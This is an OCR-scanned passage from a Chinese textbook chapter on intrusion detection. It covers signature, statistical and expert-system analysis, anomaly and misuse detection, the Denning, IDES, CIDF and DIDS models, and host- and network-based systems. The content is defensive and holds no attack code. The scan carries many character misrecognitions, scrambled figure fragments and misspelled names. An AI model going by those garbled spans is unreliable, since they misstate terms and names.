IP 地 址 的 连接 企图 可 通过 检查 IP 报头 (IP header) 的 来 源 地 址 识别 ; 带 有 非法 TCP 标志 
合 物 的 数据 包 可 通过 TCP 报头 中 的 标志 集 与 已 知 正确 和 错误 标记 联合 物 的 不 同 点 来 识别 ; 
含有 特殊 病毒 信息 的 E-mail, 可 通过 对 比 每 封 E-mail 的 主题 信息 和 病态 E-mail 的 主题 信息 
来 识别 ,或 者 通过 搜索 特定 名 字 的 外 延 来 识别 ;查询 负载 中 的 DNS 缓冲 区 溢出 企图 可 通过 
解析 DNS 域 及 检查 每 个 域 的 长 度 来 识别 ,或 者 是 在 负载 中 搜索 “ 壳 代 码 利用 (Exploit 
Shellcode)” 的 序列 代码 组 合 ;对 POP3 服务 器 大 量 发 出 同一 命令 而 导致 DoS 攻击 通过 跟踪 
记录 某 个 命令 连续 发 出 的 次 数 , 看 看 是 否 超过 了 预 设 上 限 而 发 出 报警 信息 ;未 登录 情况 下 使 
用 文件 和 目录 命令 对 FTP 服务 器 的 文件 访问 攻击 ,可 通过 创建 具备 状态 跟踪 的 特征 样板 以 
监视 成 功 登 录 的 FTP 对 话 ,发 现 未 经 验证 却 发 命令 的 入 侵 企图 等 ,建立 完备 的 入 侵 特征 数 
据 库 。 
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(2) 事件 数据 库 记 录入 侵 活 动 事件 。 

(3) 策略 与 规则 数据 库 则 记录 判别 规则 或 门限 ,记录 响应 规则 或 策略 。 

5. 结果 处 理 与 响应 

当 检测 到 入 侵 或 攻击 时 ,采取 适当 的 措施 阻止 人 侵 和 攻击 的 进行 。 

(1) 将 分 析 结果 记录 在 日 志文 件 中 ,并 产生 相应 的 报告 。 

(2) 触发 警报 。 如 在 系统 管理 员 的 桌面 上 产生 一 个 告警 标志 位 ,向 系统 管理 员 发 送 警 
铃 或 电子 邮件 等 。 

(3) 修改 入 侵 检测 系统 或 目标 系统 ,如 终止 进程 .切断 攻击 者 的 网 络 连接 ,或 更 改 防 火 
墙 配置 等 。 

如 果 系 统 错误 地 将 异常 活动 定义 为 人 侵 则 为 误 报 (False Positive) 。 如 果 系 统 未 能 检测 
出 真正 的 入 侵 行为 则 为 漏 报 (False Negative) 。 


11.2.2 入 侵 检 测 分 析 技 术 


入 侵 分 析 的 任务 就 是 在 提取 到 的 大 量 数 据 中 找到 入 侵 的 痕迹 。 入 侵 分 析 过 程 需要 将 提 
取 到 的 事件 与 人 侵 检测 技术 规则 进行 比较 ,从 而 发 现 人 侵 行为 。 分 析 策 略 是 入 侵 分 析 的 核 
心 ,系统 检测 技术 能 力 很 大 程度 上 取决 于 分 析 策略 。 在 实现 上 ,分析 策 略 通常 定义 为 一 些 完 
全 独立 的 检测 技术 规则 。 

1. 基于 特征 的 分 析 技术 

这 种 分 析 技 术 认 为 入侵 行为 是 可 以 用 特征 代码 来 标识 的 ,这 些 特征 码 构成 检测 特征 库 。 
比如 对 于 尝试 账号 的 入侵 ,虽然 合法 用 户 登 录 和 入 侵 者 尝试 的 操作 过 程 是 一 样 的 ,但 返回 结 
果 是 不 同 的 ,入 侵 者 返回 的 是 尝试 失败 的 报 文 ,因此 只 要 提取 尝试 失败 的 报 文中 的 关键 字段 
或 位 组 作为 特征 代码 ,将 它 定义 为 检测 规则 ,就 可 以 用 来 检测 该 类 入 侵 行为 。 这 样 ,分 析 策 
略 就 由 若干 条 检测 规则 构成 ,每 条 检测 规则 就 是 一 个 特征 代码 ,通过 将 数据 与 特征 代码 比较 
的 方式 来 发 现 人 侵 。 

2. 基于 统计 的 分 析 技术 

这 种 分 析 技 术 认 为 人 侵 行 为 应 该 符合 统计 规律 。 例 如 ,系统 可 以 认为 一 次 密码 尝试 失 
败 并 不 算是 入侵 行为 ,因为 的 确 可 能 是 合法 用 户 输入 失误 ,但 是 如 果 在 一 分 钟 内 有 6 次 以 上 
同样 的 操作 就 不 可 能 完全 是 输入 失误 了 ,而 可 以 认定 是 入 侵 行为 。 因 此 ,组 成 分 析 策略 的 检 
测 规则 就 是 表示 行为 频 度 的 阔 值 ,通过 检测 出 行为 并 统计 其 数量 和 频 度 就 可 以 发 现 人 侵 。 

就 系统 实现 而 言 , 由 于 基于 统计 技术 的 入 侵 分 析 需 要 保存 更 多 的 检测 状态 和 上 下 文 关 
系 , 因 此 消耗 更 多 的 系统 处 理 能 力 和 资源 ,实现 难度 相对 较 大 。 

统计 学 方法 常用 于 对 异常 行为 的 检测 ,在 统计 模型 中 常用 的 测量 参数 包括 审计 事件 的 
数量 ,间隔 时 间 和 资源 消耗 情况 等 。 目 前 提出 了 可 用 于 入 侵 检测 的 5 种 统计 模型 包括 : 

(1) 操作 模型 。 该 模型 假设 异常 可 通过 测量 结果 与 一 些 固定 指标 相 比较 得 到 ,固定 指 
标 可 以 根据 经 验 值 或 一 段 时 间 内 统计 平均 得 到 。 如 在 短 时 间 内 多 次 失败 的 登录 很 可 能 是 口 

(2) 方差 。 计 算 参 数 的 方差 , 设 定 其 置信 区 间 , 当 测 量 值 超过 置信 区 间 的 范围 时 表明 有 
可 能 是 异常 。 

(3) 多 元 模型 。 操 作 模 型 的 扩展 ,通过 同时 分 析 多 个 参数 实现 检测 技术 。 
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(4) 马尔 柯 夫 过 程 模型 。 将 每 种 类 型 的 事件 定义 为 系统 状态 ,用 状态 转移 矩阵 来 表示 
状态 的 变化 , 若 对 应 于 发 生 事件 的 状态 矩阵 中 转移 概率 较 小 , 则 该 事件 可 能 是 异常 事件 。 

(5) 时 间 序 列 分 析 。 将 事件 计数 与 资源 耗 用 根据 时 间 排 成 序列 ,如 果 一 个 新 事件 在 该 
时 间 发 生 的 概率 较 低 , 则 该 事件 可 能 是 入 侵 。 

和信 侵 检测 的 统计 分 析 首 先 计 算 用 户 会 话 过 程 的 统计 参数 ,再 进行 与 阔 值 比较 或 加 权 处 
理 ,最 终 通过 计算 其 “可 疑 " 概 率 判定 其 为 入 侵 事 件 的 可 能 性 。 统 计 方 法 的 最 大 优点 是 它 可 
以 “学 习 ” 用 户 的 使 用 习惯 ,从 而 具有 和 较 高 检 出 率 与 可 用 性 。 但 是 它 的 “学 习 ” 能 力也 给 入 侵 
者 以 机 会 通过 逐步 “训练 ”使 入 侵 事 件 符合 正常 操作 的 统计 规律 ,从 而 透 过 入 侵 检测 技术 

智能 计算 技术 在 入 侵 检 测 技 术 中 的 应 用 将 大 大 提高 检测 技术 的 效率 与 准确 性 ,如 神经 
网 络 .遗传 算法 与 模糊 技术 。 

3. 基于 专家 系统 的 入 侵 检测 分 析 

与 运用 统计 方法 和 神经 网 络 对 入 侵 进行 检测 分 析 不 同 ,用 专家 系统 对 入 侵 进行 检测 分 
析 经 常 是 针对 有 特征 的 人 侵 行 为 。 

专家 系统 的 建立 依赖 于 知识 库 的 完备 性 ,知识 库 的 完备 性 又 取决 于 审计 记录 的 完备 性 与 
实时 性 。 所 谓 知识 就 是 一 组 规则 集合 。 不 同 的 系统 与 设置 具有 不 同 的 规则 , 且 规 则 之 间 往 往 
无 通用 性 。 入 侵 特征 的 抽取 与 表达 是 专家 系统 入 侵 检 测 的 关键 。 将 有 关 入 侵 的 知识 转化 为 让 
then 结构 (也 可 以 是 复合 结构 ) ,让 部 分 为 人 侵 特 征 ,then 部 分 是 系统 判别 和 防范 措施 。 

运用 专家 系统 防范 有 特征 入 侵 行 为 的 有 效 性 完全 取决 于 专家 系统 知识 库 的 完备 性 , 建 
立 一 个 完备 的 知识 库 对 于 一 个 大 型 网 络 系统 往往 困难 重重 , 且 如 何 根据 审计 记录 中 的 事件 
提取 行为 状态 也 是 较 困难 的 。 

由 于 专家 系统 的 不 可 移植 性 与 规则 的 不 完备 性 , 现 已 不 宜 单 独 用 于 入 侵 检 测 ,或 单独 形 
成 商品 软件 。 较 适用 的 方法 是 将 专家 系统 与 采用 智能 计算 方法 的 人 侵 检测 技术 系统 结合 在 
一 起 ,构成 一 个 基于 已 知 入侵 规则 的 、 可 扩展 的 动态 入侵 事件 检测 技术 系统 , 自 适应 地 进行 
特征 与 异常 检测 技术 ,实现 高 效 的 入侵 检测 技术 及 其 防御 。 

4. 静态 配置 的 完整 性 分 析 

静态 配置 分 析 是 通过 检查 系统 的 当前 系统 配置 或 关键 文件 的 完整 性 ,诸如 系统 文件 的 
内 容 或 系统 表 来 检查 系统 是 否 已 经 或 者 可 能 会 遭 到 破坏 。 入 侵 者 对 系统 攻击 时 可 能 会 留 下 
痕迹 ,可 通过 检查 系统 的 状态 检测 出 来 。 静 态 是 指 检查 系统 的 静态 特征 (系统 配置 信息 ) ,而 
不 是 系统 中 的 活动 。 


11.2.3 入 侵 检 测 方 法 


1. 异常 检测 (Anomaly Detection) 

异常 检测 是 基于 用 户 行为 的 检测 技术 ,是 根据 用 户 的 行为 和 系统 资源 的 使 用 状况 判断 
是 否 存在 网 络 入侵 。 异 常 检 测 的 流程 如 图 11.4 所 示 。 

异常 检测 基于 一 个 假设 , 即 入 侵 行为 存在 于 偏离 系统 正常 使 用 的 事件 中 ,异常 检测 就 是 
要 找 出 偏离 正常 行为 的 事件 ,并 从 中 发 现 和 人 侵 。 异 常 检测 的 假设 是 入 侵 者 活动 异常 于 正常 
主体 的 活动 。 这 种 活动 存在 4 种 可 能 , 即 信 侵 性 而 非 异常 、 非 入 侵 性 且 异 常 . 非 入 侵 性 且 非 
异常 .入侵 且 异 常 。 
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图 11.4 异常 检测 流程 


异常 检测 一 般 先 建立 用 户 正 常 行为 的 模型 ,再 将 实际 观察 到 的 行为 与 之 相 比 较 ,检测 与 
正常 行为 偏差 较 大 的 行为 。 理 论 上 可 以 把 所 有 与 正常 轨迹 不 同 的 系统 状态 视 为 可 疑 企 图 ， 
其 原则 是 任何 与 已 知行 为 模型 不 符合 的 行为 都 认为 是 入 侵 行为 。 

但 如 果 检 测 出 来 的 不 是 已 知 的 入 侵 行为 ,而 是 与 正常 行为 相 违背 的 行为 ,就 可 能 产生 误 
判 。 因 此 在 检测 过 程 中 ,首先 必须 建立 统计 概率 模型 ,明确 所 观察 对 象 的 正常 情况 ,然后 决 
定 何 种 程度 上 将 一 个 行为 标 为 “异常 ”, 并 做 出 具体 决策 。 

异常 检测 将 入 侵 看 成 异常 活动 的 子 集 。 用 户 轮 廓 (Profile) 通常 定义 为 各 种 行为 参数 
及 其 阔 值 的 集合 ,用 于 描述 正常 行为 范围 。 其 过 程 是 系统 审计 监控 的 活动 经 过 量化 ,再 经 过 
轮廓 匹配 和 概率 阔 值 比较 ,判定 是 否 超过 正常 活动 或 人 侵 的 上 下 限 。 

异常 检测 一 般 分 为 训练 和 检测 两 个 阶段 : 

(1) 训练 阶段 。 学 习 总 结 正常 操作 或 通信 应 该 具有 的 特征 ,例如 特定 用 户 的 操作 习惯 
与 某 些 操作 的 频率 等 。 

(2) 检测 阶段 。 在 得 出 正常 操作 的 模型 后 ,对 后 续 的 操作 或 通信 进行 监视 ,一 旦 发 现 偏 
离 正 常 统计 学 意义 上 的 操作 模式 , 即 进行 报警 。 

异常 检测 技术 是 一 种 在 不 需要 操作 系统 及 其 安全 性 缺陷 的 专门 知识 的 情况 下 ,就 可 以 
检测 入 侵 者 的 方法 ,同时 它 也 是 检测 冒充 合法 用 户 的 入 侵 者 的 有 效 方法 。 但 在 许多 环境 中 ， 
为 用 户 建立 正常 行为 模式 的 特征 轮廓 以 及 对 用 户 活动 异常 性 的 门限 值 的 确定 比较 困难 。 而 
且 并 不 是 所 有 入 侵 者 的 行为 都 能 够 产生 明显 的 异常 性 ,不 可 能 检测 出 所 有 的 入 侵 行为 。 有 
经 验 的 入 侵 者 通过 缓慢 地 改变 用 户 正常 行为 模式 ,使 其 人 侵 行为 逐步 变 为 合法 , 避 开 使 用 异 
常 性 检测 技术 的 IDS 检测 。 

异常 检测 实现 技术 有 统计 分 析 、 贝 叶 斯 推理 ,神经 网 络 和 数据 挖掘 等 方法 ,分 为 自学 习 
型 和 可 编程 型 。 自 学 习 系 统 通过 学 习 事例 构建 正常 行为 模型 ,又 可 分 为 时 序 和 非 时 序 两 种 ; 
可 编程 系统 需要 通过 程序 测定 异常 事件 。 系 统 分 类 如 表 11. 1 所 示 。 

异常 检测 的 特点 是 漏 报 率 低 , 误 报 率 高 。 优 点 是 既 能 检测 特征 模式 库 中 的 已 知人 侵 行 
为 ,也 可 以 发 现 未 知 的 入 侵 行 为 ; 较 少 依赖 于 特定 的 操作 系统 ,通用 性 比较 强 ; 易 于 实现 , 易 
于 自动 更 新 ;同时 有 一 定 的 学 习 能 力 ;检测 效率 取决 于 用 户 轮廓 的 完备 性 和 监控 的 频率 。 缺 
点 是 异常 阅 值 设置 不 当 会 导致 许多 误 报 或 漏 检 现象 ;对 时 间 发 生 的 次 序 不 够 敏感 , 误 报 、 虚 
报 率 较 高 ;对 没有 统计 特征 的 攻击 方法 难以 检测 ;难以 建立 正确 的 正常 行为 “活动 轮廓 ”, 建 
立时 间 周 期 较 长 ;并非 所 有 的 入 侵 都 表现 为 异常 ,难以 设计 完善 的 统计 算法 ;自我 调整 和 优 
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化 会 消耗 更 多 的 系统 资源 ;系统 的 活动 行为 是 不 断 变化 的 ,需要 不 断 地 在 线 学 习 。 
表 11.1 异常 检测 系统 分 类 


类 型 分 析 方 法 系统 名 称 
规则 建 模 Wisdom & Sense 
非 时 序 
自学 习 型 描述 统计 IDES, NIDES、EMERRALD JiNao .Haystack 
时 序 描述 统计 Hyperview 
简单 统计 MIDAS NADIR Haystack 
描述 统计 基于 简单 规则 “| NSM 
可 编程 型 
门限 Computer-watch 
默认 否认 状态 序列 建 模 | DPEM Janus .Bro 


2. 误 用 检测 (Misuse Detection) 

误 用 入 侵 检 测 依赖 于 模式 库 , 误 用 检测 能 直接 检测 出 模式 库 中 已 涵盖 的 入 侵 行 为 或 不 
可 接受 的 行为 ,而 异常 人 侵 检测 是 发 现 同 正常 行为 相 违背 的 行为 。 

误 用 入 侵 检 测 的 主要 假设 是 攻击 能 够 精确 地 按 某 种 方式 被 编码 。 通 过 捕获 攻击 及 重新 
整理 ,可 确认 入侵 活动 是 基于 同一 弱点 进行 攻击 的 人 侵 方 法 的 变种 。 

误 用 检测 使 用 基于 知识 的 检测 或 基于 特征 的 检测 。 假 设 所 有 入 侵 的 行为 或 手段 及 其 
变种 都 能 表达 为 一 种 模式 或 特征 ,通过 对 已 知 的 人 侵 行为 和 手段 进行 分 析 , 提 取 检 测 特 
征 ,构建 攻击 模式 或 攻击 签名 。 检 测 时 主要 判别 主机 或 者 网 络 中 所 搜集 到 的 数据 特征 是 
否 匹 配 所 收集 的 特征 库 中 的 一 种 ,以 此 判断 是 否 有 入侵 行为 。 或 者 通过 收集 入 侵 攻击 和 
系统 缺陷 的 相关 知识 来 构成 人 侵 检测 系统 中 的 知识 库 , 然 后 利用 这 些 知 识 寻 找 那些 企图 
利用 这 些 系统 缺陷 的 攻击 行为 。 系 统 中 的 任何 行为 如 果 不 能 确认 是 攻击 都 被 认为 是 系 
统 的 正常 行为 。 

所 有 的 入 侵 行为 特征 构成 攻击 特征 库 。 当 监测 的 用 户 或 系统 行为 与 库 中 的 记录 相 匹 配 
时 ,系统 就 认为 这 种 行为 是 人 侵 。 误 用 检测 流程 如 图 11. 5 所 示 。 


Normal 
Activity 
System audit 


No Signature matched 
metrics 


. 


Signature matched 


Pattern 


| 
matcher 


图 11.5 误 用 检测 流程 


误 用 检测 采用 特征 匹配 ,该 检测 模式 能 明显 降低 错 报 率 , 但 漏 报 率 随 之 增加 。 攻 击 特征 
的 细微 变化 会 使 得 误 用 检测 无 能 为 力 。 关 键 是 如 何 表达 入 侵 行为 构建 攻击 模式 以 及 检测 
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过 程 中 的 推理 模型 ,把 真正 的 人 侵 与 正常 行为 区 分 开 。 当 出 现 针 对 新 漏洞 的 攻击 手段 或 针 
对 旧 漏洞 的 新 攻击 方式 时 ,需要 由 人 工 或 者 其 他 机 器 学 习 系统 得 出 新 攻击 的 模式 ,添加 到 误 
用 规则 库 中 ,才能 使 系统 具备 检测 新 攻击 的 手段 和 能 力 , 才 能 保证 系统 检测 能 力 的 完备 性 。 
实现 技术 有 专家 系统 、 状 态 转换 分 析 、 模 式 匹配 与 协议 分 析 、 模 型 推理 ,Petri 网 状态 转换 等 。 

误 用 检测 的 优点 是 具有 良好 的 精确 度 , 误 报 率 低 、 漏 报 率 高 ;依赖 于 对 入 侵 攻击 和 系统 
缺陷 相关 知识 的 不 断 更 新 和 补充 。 误 用 入 侵 检测 主要 的 局 限 性 是 仅仅 可 检测 已 知 的 弱点 ， 
不 能 检测 未 知 的 入 侵 行 为 ;对 内 部 用 户 的 滥用 权限 的 活动 检测 困难 ;提取 入 侵 特 征 建立 的 规 
则 库 需 要 不 断 更 新 。 


11.2.4 入 侵 检 测 模型 


1. Denning 的 通用 入 侵 检测 模型 

最 早 的 通用 入 侵 检测 模型 由 Denning 于 1987 年 提出 ,如 图 11.6 所 示 。 该 模型 假设 : 
人 侵 行为 明显 区 别 于 正常 的 活动 ,入 侵 者 使 用 系统 的 模式 不 同 于 正常 用 户 的 使 用 模式 ,通过 
监控 系统 的 跟踪 记录 ,可 以 识别 人 侵 者 异常 使 用 系统 的 模式 ,从 而 检测 出 入侵 者 违反 系统 安 
全 性 的 情况 。 


审计 记录 /网 络 数据 包 等 规则 更 新 


| 特征 表 更 新 异常 记录 
事件 产生 器 行为 特征 模块 规则 模块 


事件 变量 冰 值 
图 11.6 Denning 的 通用 入 侵 检 测 模型 


Denning 模型 有 6 个 主要 构件 : 主体 、 对 象 .审计 记录 、 特 征 轮廓 .异常 记录 和 行为 规 
则 。 特 征 轮廓 表示 主体 的 行为 特征 ,也 是 模型 检测 的 关键 。 行 为 规则 描述 系统 验证 一 定 条 
件 后 抽取 的 行为 ,检测 能 把 异常 和 可 能 的 入侵 关联 起 来 并 提出 报告 。 审 计 记 录 由 一 个 行为 
触发 ,而 且 记 录 主 体 尝 试 的 行为 ,行为 本 身 , 行 动 对 准 的 目标 ,任何 可 能 导致 例外 的 情况 以 及 
行为 消耗 的 资源 和 独特 的 时 间 惟 标记 。 审 计 记 录 会 和 范 型 进行 比较 (使 用 适当 的 规则 ) , 那 
些 符合 异常 条 件 的 事件 将 被 识别 出 来 。 

这 个 模型 独立 于 特定 的 系统 平台 、 应 用 环境 、 系 统 弱 点 以 及 入 侵 的 类 型 ,也 不 需要 额外 
的 关于 安全 机 制 、 系 统 脆弱 性 或 漏洞 攻击 方面 的 知识 ,为 构建 入 侵 检测 系统 提供 了 一 个 通用 
的 框架 。 

2. IDES 模型 

1988 年 ,SRI/CSL 的 Tersa Lunt 等 人 改进 了 Denning 的 人 侵 检 测 模型 ,并 开发 了 一 个 
IDES 模型 ,如 图 11.7 所 示 。IDES 基于 这 样 的 假设 : 有 可 能 建立 一 个 轮廓 来 描述 发 生 在 主 
体 (通常 是 用 户 ) 和 客体 (通常 是 文件 .程序 或 设备 ) 之 间 的 正常 的 交互 作用 。 这 个 框架 由 一 
个 使 用 规则 库 ( 规 则 库 描述 了 已 知 的 违例 行为 ) 的 专家 系统 支持 。 

该 系统 包括 一 个 异常 检测 器 和 一 个 专家 系统 ,分 别 用 于 统计 异常 模型 的 建立 和 基于 规 
则 的 特征 分 析 检 测 。 通 过 规则 匹配 来 检测 攻击 ,如 图 11.8 所 示 。 

3. CIDF 模型 

美国 国防 部 高 级 计划 局 (DARPA) 提 出 的 CIDF( 公 共 入 侵 检测 框架 ) 是 一 个 人 侵 检 测 
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一 一 模式 匹配 器 ”一 =| 策略 规则 


落 清 料 半 息 


Bi 


一 一 | 轮廓 特征 引擎 一 一 | 异常 检测 器 ”= 


图 11.7 IDES 模 型 


主体 | ~| ”安全 监控 器 上 | 客体 | 


审计 数据 实时 信息 


1 


. 规则 
添加 新 规则 DL 系统 轮 亡 。 上 一 一 -| 攻击 状态 
匹配 


图 11.8 IDES 模 型 的 检测 


系统 的 通用 模型 , 它 将 入 侵 检测 系统 分 为 4 个 组 件 : 事件 收集 器 .事件 分 析 器 .响应 单元 和 
事件 数据 库 , 如 图 11.9 所 示 。 

(1) 事件 收集 器 。CIDF 将 IDS 需要 分 析 的 
数据 统称 为 事件 , 它 可 以 是 网 络 中 的 数据 包 , 也 可 
以 是 从 系统 日 志 或 其 他 途径 得 到 的 信息 。 事 件 收 


响应 单元 


集 器 的 任务 是 收集 事件 并 转换 成 GIDO( 通 用 入 事件 收集 器 
侵 检测 对 象 ) 格 式 传送 给 其 他 组 件 。 | 
(2) 事件 分 析 器 。 事 件 分 析 器 分 析 收 到 的 各 种 级 别 的 事件 


GIDO ,并 产生 新 的 GIDO 再 传送 给 其 他 组 件 。 分 图 11.9 CIDF 入 侵 检测 通用 模型 
析 器 是 一 个 轮廓 描述 工具 ,统计 性 地 检查 事件 的 
时 间 序 列 ; 是 一 个 特征 检测 工具 ,检查 是 否 有 已 知 的 滥用 攻击 特征 ;是 一 个 事件 关联 器 。 

(3) 事件 数据 库 。 用 于 存储 GIDO, 以 备 系统 需要 的 时 候 使 用 。 

(4) 响应 单元 。 响 应 单元 处 理 收 到 的 GIDO ,并 据 此 采取 相应 的 措施 ,如 杀 死 相关 进程 、 
将 连接 复位 、 修 改 文件 权限 等 。 

4. DIDS 检测 模型 

分 布 式 人 侵 检测 系统 (DIDS) 是 由 分 布 在 一 个 大 型 网 络 中 的 多 个 人 侵 检测 系统 (IDS) 所 
构成 的 有 机 系统 。 该 系统 中 的 IDS 通过 彼此 间 的 通信 和 协调 来 协同 展开 各 种 数据 采集 ,分 
析 和 事件 检测 活动 ,共同 实现 对 整个 网 络 全 面 而 有 效 的 监控 。 

DIDS 采 用 了 分 层 结构 ,包括 数据 、 时 间 、 主 体 、 上 下 文 . 威 胁 和 安全 状态 6 层 , 如 表 11. 2 
所 示 。 既 能 检测 网 络 入 侵 行为 ,又 能 检测 主机 的 入 侵 行为 。 系 统 通常 由 数据 采集 模块 .通信 
传输 模块 、 入 侵 检测 分 析 模 块 、 响 应 处 理 模 块 、 管 理 中 心 模块 和 安全 知识 库 组 成 。 按 需要 可 
以 安装 在 单独 的 一 台 主 机 上 或 者 分 散在 网 络 的 不 同位 置 ,将 局 部 结果 信息 提供 给 入 侵 检测 
管理 中 心 。DIDS 模型 如 图 11. 10 所 示 。 
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表 11.2 DIDS 信息 数据 表 


层次 名 称 解释 说 明 
6 安全 状态 (Security State) 网 络 整体 安全 情况 
5 威胁 (Thread) 动作 产生 的 结果 种 类 
4 上 下 文 (Context) 事件 发 生 所 处 的 环境 
3 主体 (Subject) 事件 的 发 起 者 
: 事件 (Event) 日 志 记 录 特 征 性 质 和 表示 动作 描述 
1 数据 (Data) 操作 系统 或 网 络 访问 日 志 记 录 
DIDS 控 制 器 
主机 代理 LAN 代 理 
主机 事件 发 生 器 LAN 事 件 发 生 器 
主机 监视 器 LAN 监 视 器 


图 11.10 DIDS 检测 模型 


11.2.5 人 入侵 检测 响应 系统 


入 侵 检测 的 响应 系统 一 般 包括 记录 报警 和 阻 断 响应 ,也 可 与 防火 墙 联动 响应 。 入 侵 响 
应 系统 (Intrusion Response System) 按 响应 类 型 可 分 为 报警 型 响应 系统 .人 工 响应 系统 和 
自动 响应 系统 ; 按 响应 位 置 可 分 为 基于 主机 的 响应 和 基于 网 络 的 响应 ; 按 响 应 范围 可 分 为 本 
地 响应 系统 和 协同 人 侵 响 应 系统 ; 按 响应 方式 可 分 为 主动 响应 和 被 动 响应 。 自 动人 侵 响应 
系统 总 体 结构 如 图 11. 11 所 示 。 


1 
一 | 沽 共同 呈 


响应 策略 
知识 库 


图 11.11 自动 人 侵 响 应 系统 


被 动 响应 一 般 记录 安全 事件 ,产生 报警 信息 ,记录 附加 日 志 并 激活 附加 入 侵 响 应 工具 。 
温和 的 主动 响应 一 般 会 隔离 人 侵 者 也, 禁止 被 攻击 对 象 的 特定 端口 和 服务 ,隔离 被 攻击 对 
象 。 严 厉 的 主动 响应 会 跟踪 并 警告 攻击 者 , 断 开 危险 连接 ,甚至 反击 攻击 者 。 


-438 


11.3 人 侵 检测 的 实现 


1. 基于 主机 的 入 侵 检 测 系统 (HIDS) 

HIDS 通过 监视 与 分 析 主机 的 审计 记录 和 日 志文 件 来 监测 人 侵 。 除 了 对 审计 记录 和 日 
志文 件 的 监测 外 ,还 有 对 特定 端口 .检验 系统 文件 和 数据 文件 的 校 验 和 。 主 要 用 于 保护 运行 
关键 应 用 的 服务 器 。 如 果 仅 在 应 用 层 收 集 信息 来 监控 在 某 个 软件 应 用 程序 中 发 生 的 活动 ， 
信息 来 源 主要 是 应 用 程序 的 日 志 , 就 形成 基于 应 用 的 人 侵 检测 系统 ,是 HIDS 的 一 个 特殊 子 
集 和 细 化 ,监控 的 内 容 更 为 详细 ,相应 的 监控 对 象 更 为 狭窄 。 

优点 : 能 确定 攻击 是 否 成 功 ;监控 粒度 更 细 ( 如 敏感 文件 .目录 程序 或 端口 ) ,监控 的 目 
标明 确 , 视 野 集 中 ,可 以 检测 一 些 基于 网 络 的 IDS 不 能 检测 的 攻击 ;配置 灵活 ;可 用 于 加 密 
的 以 及 交换 的 环境 ;对 网 络 流量 不 敏感 ;不 需要 额外 的 硬件 。 

缺点 : 占用 主机 的 资源 ,产生 额外 的 负载 ;缺乏 平台 支持 ,可 移植 性 差 ,因而 应 用 范围 受 
到 严重 限制 ;实时 性 差 ,依赖 于 主机 及 其 审计 子 系统 。 

2. 基于 网 络 的 入 侵 检测 系统 (NIDS) 

NIDS 侦 听 网 络 上 的 所 有 分 组 来 采集 数据 ,使 用 原始 网 络 包 作为 数据 源 分 析 可 疑 现 象 ， 
通常 利用 一 个 运行 在 混杂 模式 下 的 网 卡 来 实时 监控 并 分 析 通 过 网 络 的 所 有 通信 业务 。 主 要 
用 于 实时 监控 网 络 关键 路 径 的 信息 。 

优点 : 监测 速度 快 、 隐 项 性 好 、 视 野 更 宽 ; 较 少 的 监测 器 ;攻击 者 不 易 转 移 证 据 ;操作 系 
统 无 关 性 ;可 以 配置 在 专用 的 机 器 上 ,不 会 占用 被 保护 的 设备 上 的 任何 资源 。 

缺点 : 只 能 监视 本 网 段 的 活动 ,精确 度 不 高 ;在 交换 环境 下 难以 配置 ; 防 人 侵 欺 骗 的 能 
力 较 差 ; 难 以 定位 入 侵 者 。 

3. 分 布 式 入 侵 检测 系统 DIDS 

(1) 集中 处 理 的 DIDS。 这 种 结构 的 IDS 有 多 个 分 布 于 不 同 主机 上 的 审计 程序 ,但 只 有 
一 个 中 央 人 侵 检测 服务 器 。 审 计 程 序 把 当地 收集 到 的 数据 发 送 给 中 央 服 务 器 进行 分 析 处 
理 。 这 种 DIDS 在 可 伸缩 性 、 可 配置 性 方面 存在 致命 缺陷 。 随 着 网 络 规模 的 增加 ,主机 审计 
程序 和 服务 器 之 间 传 送 的 数据 量 就 会 又 增 ,导致 网 络 性 能 大 大 降低 ;一 旦 中 央 入 侵 处 理 服务 
融 出 现 故 障 ,整个 检测 系统 就 会 陷入 瘫痪 ;各 个 主机 的 需求 不 同 , 因 此 服务 器 配置 也 非常 

(2) 等 级 式 处 理 的 DIDS。 在 这 种 DIDS 定义 了 若干 个 等 级 的 监控 区 域 ,每 个 IDS 负责 
一 个 区 域 ,每 一 级 IDS 只 负责 所 监控 区 的 分 析 , 然 后 将 当地 的 分 析 结 构 传 送 给 上 一 级 的 
IDS。 缺 点 是 网 络 拓扑 结构 改变 时 ,区 域 分 析 结果 的 汇总 机 制 也 需要 做 相应 的 调整 ;要 把 各 
地 收集 到 的 结果 传送 到 最 高 级 的 服务 器 进行 全 局 分 析 检 测 ,安全 性 并 没有 实质 性 的 改进 。 

(3) 协作 处 理 的 DIDS。 将 中 央 检 测 服务 器 的 任务 分 配给 多 个 基于 主机 的 IDS, 这 些 
IDS 不 分 等 级 ,各 司 其 职 , 负 责 监控 当地 主机 的 某 些 活动 。 其 可 伸缩 性 、 安 全 性 得 到 了 显著 
的 提高 ,但 维护 成 本 却 提高 了 很 多 ;增加 了 被 监控 主机 的 工作 负荷 ,如 通信 机 制 . 审 计 开销 和 
跟踪 分 析 等 。 

4. 多 用 于 异常 检测 的 入 侵 检测 技术 

用 于 异常 检测 的 入侵 检测 技术 包括 基于 统计 的 异常 检测 .基于 特征 选择 异常 检测 .基于 
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贝 叶 斯 推理 异常 检测 .基于 贝 叶 斯 网 络 异 常 检测 .基于 模式 预测 异常 检测 .基于 神经 网 络 异 
常 检测 .基于 贝 叶 斯 聚 类 异常 检测 .基于 机 器 学 习 异 常 检测 和 基于 数据 挖掘 异常 检测 等 。 

(1) 基于 统计 学 的 异常 检测 技术 

基于 统计 学 的 异常 检测 (Statistical Anomaly Detection) 利 用 统计 分 析 技 术 建立 系统 或 
网 络 的 正常 活动 模型 ,将 系统 或 网 络 的 活动 与 正常 活动 模型 比较 来 检测 渗透 和 攻击 。 

优点 是 如 果 训 练 数据 选择 正确 , 则 认为 特征 是 稳定 的 ,不 需要 频繁 地 进行 模式 的 更 新 。 
缺点 是 建立 模型 使 用 的 数据 实际 情况 并 非 是 纯净 的 ;传统 的 统计 量度 往往 不 能 反映 事件 间 
的 顺序 ;为 统计 量度 选择 合适 的 国 值 是 很 困难 的 ;系统 的 正常 活动 行为 可 能 与 异常 行为 存在 
交 迭 ,可 能 出 现 漏 报 现象 ,同时 合法 用 户 的 行为 也 可 能 偏离 正常 轨迹 ,从 而 引起 系统 的 误 报 。 

(2) 基于 机 器 学 习 的 异常 检测 技术 

机 器 学 习 是 人 工 智 能 和 统计 学 的 结合 物 ,使 用 程序 或 系统 来 模拟 或 学 习 人 类 的 学 习 行 
为 ,以 获取 新 的 知识 或 技能 ,重新 组 织 已 有 的 知识 结构 使 之 不 断 改善 自身 在 完成 某 个 任务 或 
